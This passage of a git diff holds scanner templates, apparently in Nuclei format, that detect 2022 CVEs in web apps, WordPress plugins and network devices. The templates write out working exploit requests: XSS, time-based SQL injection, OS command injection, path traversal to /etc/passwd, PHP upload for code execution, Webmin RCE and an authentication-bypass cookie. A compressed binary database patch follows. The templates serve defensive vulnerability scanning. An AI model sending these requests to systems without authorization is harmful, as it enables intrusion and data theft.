HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5('CVE-2022-25487');?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7ee3686858eb89dd68ccf85f0ea03abe"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28023","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_supplier HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
index 546025681d5834940e97f1be90b6e823643ab991..6eaaa01bcee8564cafcb6e52149ec04b2ff1e9bc 100644
GIT binary patch
delta 375132
zcmb5UcT`hf&^AgBoj~Xy1f&<~y+{d26EGkGL5P4-6{Lt1JrF_(g3>~hE>#IlLXnPi
z5s(^@rqa70O$2WIy?4E9eRth|zP<9tK0A|r&e=2b%*-=cS?AiH<pRX;GUpVwzx^ra
zhbX`da@C&QCVV6>>kmqV?~gp+v3;zI_jn&}4{DQNZVn4)N)j>?T913kq;qr`c@c@@
zZ{$NWrZNuGIc!%bjz=&ECiIl*{}lE_N=j$b8e^z_PJsk5+>J@;y{1%IERZ*}h%EOi
z(>QVn<EXj}TPG>zCXi}F(I?WFV#uhoZ%!R@4JO%L$F>GH-t;docYIq!6WKX?ny5p@
zr7lV@cx3*f2!;@NtXPo^`#Rc~Joa=4CnU?r`3i%fO0(>3(oxoC0z(+gGE)%W5tt`G
z^zab{JTlfz3aCdo2Bt`X-FRrj6jfzn5k5j7_^~Is%aSVzP*@Pbp(rj`9u@Xf$Gphu
z`%unjn7xF9jG|<EhyYIsmd$ikcwY5Z$IpIRQ=U0dK~)kp1rrCJ`{Y+G!*zsIS-EZX
z5(7kTDa&HPHjdp?&yn`sR4=XP2_1f&MSjjMkubPxuBh^mu{Sc($PjJ{kqncRfVp@Z
z#rkTR842YBB#dOLybRvp2ni{%F}rH0^WqDSsunX@SxQO+G8!}4YTc#pIwVQ3v@W*6
z3e8)1*0yoy^0cneC|3$n@y-rQ#fL>kpE|&XhO=VQ<O)b#?UxDZrgikZIc0+ORBiHl
zEYjp|5+y?RCifRLd|U({#zRSNn>>SJBNWEqlH@ADm!g@Nq8X5$z7<3&KwGg$=)<jt
z9R`s+nb9UZ{IP}_U-CzT1=PO8s)#6xB(;J~Q<*3-!xi};V1{6~6(q~;zAqUt@h=&v
z{lSVA6*}WdFeWkOlt1pH>O5ZrB}Si`nJL;1kSIP@-Jgo?#UD1QDtc#IuEWr7GgM>Y
zxqV-N3_@JZ7#V2-M;3U=9p=HzJ=*;RX(SXCAOVvk`>B4bB9SJ(kNgAMAi9j)MR1w?
zo{>qIPO=^b8jrzc#5*jOPm>K$tOfJNQ>NH+Wx%f(<5DU2;amh054WD~a(Xsw7eriA
zf?WTWAzU2WMa8_P_sfwRJ61*?c7?k^UJ($vWy6~=*zx7@19H+bdhc*hQNPd+62tpQ
zV@#TeHa5Zsr;}#S!<}6A-JGg2ouDXmYuTJupOKe|A(kA=grYOJ!6KgWJ)(^Kryjnm
zqyE7P*+2)2@nd0f9+)R(;L}7S%Xh8GU3cVV6}SC`qr4~st4B|Lg~^>HWO7pCe1!q>
zPrZh0f;pzb<agA{U6K9ehssiLxT+tYdVwtKF1jQtK@ompk|kIxZgT5H*;9WkmchhD
znUhc+7?A|MCd)1r%g$@;QP-j9cnw#N5&&apg&tN6LySE*IQ<?JC7W6|(ThJcfT2H<
z3D3|z@ysb>kuSJ)cM-(;^+N|Z0}Np6ZT1ej>9QV6sJav+z3<43i|a2Z+Uk8$?6{3v
zfjS+1gpupDx6d@k?G`1uBrF5iZPnlZ=pDq5uA8k@EQ&g=kRh_33ak%Nrui4#>(slp
zXSJ(PW#u*Afi@q44N}Hu(@%i9CTLS1i@<HFu@hr!izcR!E2H9>MomzR4WQ1-Elo*O
zESZ%Q*^9=GAbSbIAWh`d1N&~uO1OP@6kQK(J<|1u&`e{;STC)sTgBoF9Gi-|MLg$+
zi4QupsE=4?`8U-a$o>~~$9fS09&f%4#lYaQP@|buy@<`C`F?h8;f*M=J418>RLnP&
zIcQVFa-J6WzJ6NJkz!nm2P~2HqT_l3+8ng>bU94)eHczjX;z^etcae2gtSmXuU>6k
z2DZ1ibjGMwx5&I~DL$p<i^&T4&o6sOv!bQKj>$n|Z|_u91xMD#u5#A;d65}9%4mhF
zXfh`W$)c-Y^(0{m+YgK0AWO+cUKkP)GMS&6nwGj&cRQZi&&GBQ2xv(%E4Zy!U{%<`
zL_<_prn_r?SqGRJ%q=3sODpx--KQv%0#nqOI1CXU;u8KsA)nMi8OsS1t1pRl0n5b-
z?ad<8bkHQs(U81;k-djMAYW;&kBd~}X!hl+u&K@)MQ~YL$7`%w$ah6bF2zxGc$D)7
z`gO2Ji%~xg@&qW1%04prCR-8k0NohqSB`!J^Sa7kcGMZpZuEm3JMz<LG5Xgm;@+rT
zaCTP5%|K5pQL}<^WsyTtj1e-HqMm&ijmviBGiv3CgOYrvP>!|E;^B7}*)zZz#f3k{
zc;7`D^&8?N9*`k|3yhrI$V_htCNYURdU)xJ-WQRLk_RA!Om=zVx!lnnDN59Z3Cd9=
zk;CW(#mVeWt#8=()7(fj5|PDmWOgW&#Mb#Pp$j~Uv&}^QIuv3v{_vXdA;I@lp`?_t
zSdw%x5#MeSNzw7b8PR#w8p26GB^S4kSz>Kr<{g`BpLN6n$;xeYGZ-oI>CssBaS<ai
zlOG8*fYd{?#lCJB(Tu2)Vy;FAXGSv!j#jXlO;o$Qi5Bj$8R!TvRDX!>VBt{$Q<Ggk
zR@MQZ=q2lAcrrH*YDg2c%wuFvd~IZ*0n!Mi|Hhn0T7u{hVwpyENrFt8)-sj`$jJVv
zmU?BWJc3SxUM5Rssi3bxPhBmU+@mP@hrmiXgZ}i?4U>M4a<+&!SoS()dZT%od;P`+
zNL9HH9Q$K&9U~C&0Q+m$dck?s0<(dKKZ^19xL=o$eo;^I6L7r77QquA|8pYRBge8%
z_OS%n9U9{o!J@?z(XVF|@lA^9(F)3AG`C0BEh#KToOy5P&#Xxi-1XSR0<<k!WNiTx
zco9aN<qc~@?z$rHYB5Xg7v0679P@Z~WDT4DeKZ-hX6B(eMLo-)YLYr9i*ZuZcxJM@
zaG)R+=SxsGX#~zXT+mCDtnbCs@_JN9txYMaW8b-4(Hk7RRRNV1QKwEaH&x*0^14qM
zp>VS<<LEoxB-NuKQDuo7oB2?mKyRP|T8+J<r$cSF*^<!WCn&CH!=1+UHDA%;OPRas
zRcUVu51r2~qb<MmxK&E}(P%O<{i7KQs)TV943>I0o@0>wQ2<FxxrlMEVftWn0X^*g
zM>e(lQD{MC!l0-!*s$d>OBEUkg;wKI+}|BI^z-mMc@W<?W=Qem0oqbKJRV3;6qLo8
zPpC3S@G~%ZV5q^2AhKyw3SuPwX>A+q(_L2mg;d{0dn5qLW%7nRjf+OjJfH)sAzrEQ
zhJ4se<O?YeOzLJp2R*Y@@?v-aLNXBxE}0=$j_p?~S9TW3)WEqS_1?5jYNyZ&zpeKZ
z5Yy&nWCD?Umb9{<Zh5%Z0U&xiPn?mEfxb!Tdi+s1u1+;c5B{U)`{NFdxP7R>HS0}M
zl@vqVtevn!#0pu7I>>t$cLaayBF8VZ1Y=T{mJnJG5V|kFO<JrD3cC-B>qlIbx*5pG
zX(gJ1f{RcX*f9&lV-ju)=FD_dD}GT!M#f^T9TAe?o8g%{wu|9_LjAnqOy*(-D&}6n
z_&o=+&{a~?QcMtEH5MzPOmB=yABYt!K|c&wOWk`jMi3J)_ue3n8YVB9oZql4LHpp?
zQiD6_*eA#bH5b1b^(6(#GiCHrdFmt(%;GhXv^k?KHuh$`iiQ2;m5O(+3GvFhMo`DZ
zP=Xn4?N>TGNu2-~oh_J&0NsaKh?uCt*Bro1oXYc*V@)c2doIoeW3x{?_Iv4+AaN{h
z{(3)k6*F&jfmua=g^S{Cys_3|R)&fqzrux+o%McxgxnS1j?(#(z_CC34e8-poK#($
zM9n~#^RgHN()^+`s_HJ~KHKZ9nh<F=UTqNvQ;yXMbOdxb>8UAmGWs)3iy=&L59Xhi
ztN2y7yf0UYo1Nup8tV?d@^=>D;Z7AN<r5$P(tm6pEC50jp*5k5!>VZy4C$(M7^91#
zQfXzS5+fM|lMMSiSuhwj<~Rodk7D6k#v|2-OR70`!4lXM6Um!(Nt?xEuub=^pNlk~
zb&3v*)B$np?}ov94&KF$_1g3d{olVM)r^_#WezY7n^9rB4jyHi?(S56n#anDt_qS8
zV9Qfz#*in3m)_3f$4?@%xHuOUJT9-Z?6=%Ny3ee^K^nsq4jagIOV46es80)atp8O4
zTWo;XL}&8Uiz3GQWEKx}M)!uL*-hd$q7$8fpA9!pdE{<Ux9O6-u3H=tG(~H%$HOm#
zP^vE@*R#7fREGn2K^o@S4kg}3Nkcixo<c$fg+eAJKNmGbZ@Kns2pF~`nlHImVa;75
zjRFKsy<sneYZZR>n1gs=xuKGQhHdZVuU=JD&0tX*Ely_nY7)GB0JG4ae~R%2+d%;g
z(|+&zP#i6Y2(7YZLuR}VK1D{R1uzi8qlRs~k%J=(R-ZgZ(BV{*7Ex5kQhi9uwxrP=
zGZ)lPKG9jd{{u<oz%4_=82#YBv;5<|1h_nL+w$3dxyO4wEy;!nk^G_|^nxRh*Xyp{
zkj$x>?l?#}_E^u}6WcGM%*&eq7<oP9290yc1PV$X8{TF))iZau7G}&%x4}f>S`r}}
zqwb6)3I_QP;BVgx>a(tw^(A71^myH_B@f;iNxGTjrp^Ns;-jG-W_&FGdWo4N0-wp_
zB43Y1T@)$p3H&u{1k{5cf)Hng(u*Ofjd;FbnrJibEk`Zg*WnXkmHi0RFjFNb!C094
zjRa{Zy}^%lj5J5WSgUorp+EL~brd_kJXO?W-Agrx+~s>4&LBw7%*af8LMq+`E(pJk
zNM3W`Dj=?=1;4|aQB!VNhk6(wHI0OjvvIVyzY$l$gnKfX^@tcHe{4c2a$6#wC``=D
z^TWjh93@I4_cDMCcV7`36QM6AWj0jA`!}T&hI4^w=xA;A6p1+z@mAFZyh!k^4u-^N
z3d*qZNF+0aRW_=Zf;NGM_C#<dE<c=0#|Q~E(jkc;(ftR8oNOWT<}k~Scv?kC*Civ?
zYLd!iu|?B&cQas<x=2N-gbJvl#5AV1peCc`78Y=)UW6MzmUUH-u0YGW=cp*Zcb@0&
zOdR&l1XJPYe)JTC<0>51Eju7g3`pB7^_t|dezNe+>R)<E&Ll`J1de3Xx)~@YsF2tm
zJTFf5pBuu%X-O_`iWigk$~;0<1jv3-PB2cTNG98d(HaX;>g$>RMix>M0k=X2l57+Y
z5Oc*y8)Ajv>7Qg2AC_oDTQb_WTW2H`%`B9R5@3uUtcJ=P2~nyj=?aQNfAymKY|y9H
zWkgvRoVdI|%Wao0<|t}oZAPmklw9axBxFdGGhr3rIJoB_D9OVuX{`${{ArEmxhZ66
z8;eG5AHayWShsZV7E;uC2?4~5u1Y7NAW~3wsH#|oh%d>#TYF^GMGC@)&IRMTwyX}!
z9MM|3<eW&I2@EGPk{U$;Ng$^tCl-vdV1-GP2Y$MoeQRitL{d@bp1dSE_yy(lTX=f<
z*zeucS@g0?Lp*lX*$}bXlnBt9eM_-;RcQig1gT*@iCXm{IaQ-M;EsivxQ5Hznt)Mp
zdj2rzgeD7Sf-n@k;+&ZjiYBtWuNQR%Nf(|9^ojU-ch}FKLX*OAE)ZEhAr@b=j*Ja!
